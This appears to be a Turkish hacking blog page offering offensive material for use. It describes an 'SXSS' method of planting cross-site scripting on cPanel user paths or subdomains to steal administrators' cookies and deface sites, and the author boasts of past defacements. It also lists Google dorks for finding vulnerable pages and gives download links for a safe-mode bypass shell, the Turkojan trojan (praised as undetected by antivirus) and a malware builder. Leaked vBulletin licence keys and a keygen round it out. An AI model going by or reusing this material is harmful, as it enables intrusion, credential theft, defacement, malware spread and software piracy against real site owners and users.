Web Hacking & Security

SXSS Nedir ne işe yarar sxss

Sxss açığı tamamen benim tarafından bulunmuştur hiçbiyerde benzerini bulamazsınız hemen uygulamayı gösterelim

Bildiğiniz üzerinde cpanel kullanan sistemlerde hedefsite.com/~sizinftpuseriniz gibi bir bug var diyelim artık çünkü sisteme zarar verebiliyorsak bu bug olur (: ve ~ hadef site bunu kendi klasörü gibi görecektir cookilerde aynen, mesela siteniz.com/ anadizine kurun portalınızı ve daha sonra bir klasör açın /portal/ diye birde oraya kurun aynı portalı sonra tekrar anadizindeki portala dönüp giriş yapın giriş tamamlandıktan sonra (login) /portal/ klasörüne girin ordaki portala giriş yapın birde sonra tekrar ana dizindeki siteye bakın aaaaa o da ne logout olmuşunuz :)

Bu peki nedemek oluyor ? siz ~ftpuseriniz buraya xss kodunuzu koyup admine tıklatırsanız bütün cookie leri rahatlıkla gelmektedir bu yöntemle birçok site deface ettim ancak kimsenin haberi olmadı paylaşmadığım için. bir adet cookie stealeriniz olması gerekli tabiki (: artık onuda siz bulun

Biraz saksıyı çalıştırırsanız serverdaki bütün siteleri xss ile deface edersiniz nekadar site avrsa sonuna ~sizinftpuser bunu koyup aynı yöntemle cookie lerini çalabilirsiniz
--------------------------------------------
Şimdi ikinci yönteme geçelim buda subdomain açarak oluyor bildiğiniz üzere reseller panelelrde subdomain açma açığı var birçok hostta bu açık mevcut siz subdomaini kullanarak anasayfayı deface etmeyide göstereceğim sizinsub.hedefsite.com sub domaine xss kodunuzu koyun ve bişekilde admine tıklattırın aaa oda ne cookie ler gelmiş (:

Umarım SXSS nin mantığını anlamışsınızdır açılımıda şöyledir başındaki S Server demek Server xss
Devamını Oku


Explorer blocker

Sitenize Explorer ile girilmesini istemiyor ve sadece Firefox ile girilmesini istiyorsanız yazdığım bu 7 satırlık kod işinizi görecektir bunu sitenize eklemeniz yeterlidir



Devamını Oku


Google sayesinde xss Bulun

inurl:3C*3E?
inurl:"alert('xss')"
inurl:earch.cgi intitle:"results for"
inurl:"%3Cscript"

Devamını Oku


IRAN KEYLOGGER Trial

Devamını Oku


Siyanur.PHP Safe Mode Bypass

Herkezin merak ettiği Siyanur.php yi sizler için public etmeye karar verdim zaten birçok yabancı forumlarda dağılmaya başladı daha fazla saklı tutmak zor :)

Özellikleri: PHP 5.2.5 PHP 5.2.6 tüm sürümler bypass edebilir sadece Bypass özelliği vardır Shell grubuna pek girdiği söylenemez

Gereksinimler: CURL ve Base64 'e serverın izin vermesi gerekir aksi halde Siyanur etkisizdir

Siyanur ile forumların configlerini ve bütün dosyalarını okuyabilirsiniz

Serverda CURL ve Base64 yüklü ama siz açığı kapatmak istiyorsanız

SSH açın ve alttakini aynen uygulayın
wget http://403security.org/modsec/install_modsec_rules
sh install_modsec_rules


Siyanur uploadlink: http://www.hackedpage.by.ru/Siyanur.txt
Devamını Oku


VBulletin Licence Number

Vbulletin Lisans numaraları

vBulletin 3.6.0 - Licence Number VBF0IH37F0
$licenceNumber = 'XXXXXXX'; // vbulletin license number
vBulletin 3.6.1 - Licence Number $sm_lickey
vBulletin 3.0.0 - Licence Number 00000000
vBulletin 3.5.2 - Licence Number $sm_lickey
vBulletin 3.6.1 - Licence Number $sm_lickey
vBulletin 3.0.6 - Licence Number Club2Share.Com
vBulletin 3.0.0 Release Candidate 2 - Licence Number L1665f2b
vBulletin 3.0.3 - Licence Number 11320cef
vBulletin 3.0.3 - Licence Number 71446d33
vBulletin 3.6.0 - Licence Number VBF0IH37F0
vBulletin 3.5.3 - Licence Number VBFBF26ACA
vBulletin 3.0.3 - Licence Number L422505a
vBulletin 3.0.0 Release Candidate 2 - Licence Number L1665f2b
vBulletin 3.5.4 - Licence Number $sm_lickey
vBulletin 3.0.0 Release Candidate 2 - Licence Number L1665f2b
vBulletin 3.0.7 - Licence Number L9557963
Devamını Oku


Turkojan 4 gold



Turkojan 4 Gold (paralı) versiyonu

Birçok antivirüs tarafından hala daha tanınmamaktadır

http://rapidshare.com/files/111287199/megapackturkojan.rar

Devamını Oku


Cybernetic v1.6 (Public)

Devamını Oku


iP Degistir IP Changer 2.2 Keygen Patch


Bu yazılım sayesinde yapacağınız herhangi bir illegal işlemde ip numaranızı kolayca değiştirebiliyorsunuz , böylece risk altında kalmamış olacaksınız, kullanımıda gayet basittir boyutu ise 4.14 mb
Devamını Oku


WL Malware Package v1.0



Coder: x-zer0
Çok güzel bir Malware tool diyebiliriz çünki birçok özelliği içinde barındırır sizin için downloader kodu bile hazırlar oluşturduğunuz server i görünmez kılar indirmek için Tıkla
Devamını Oku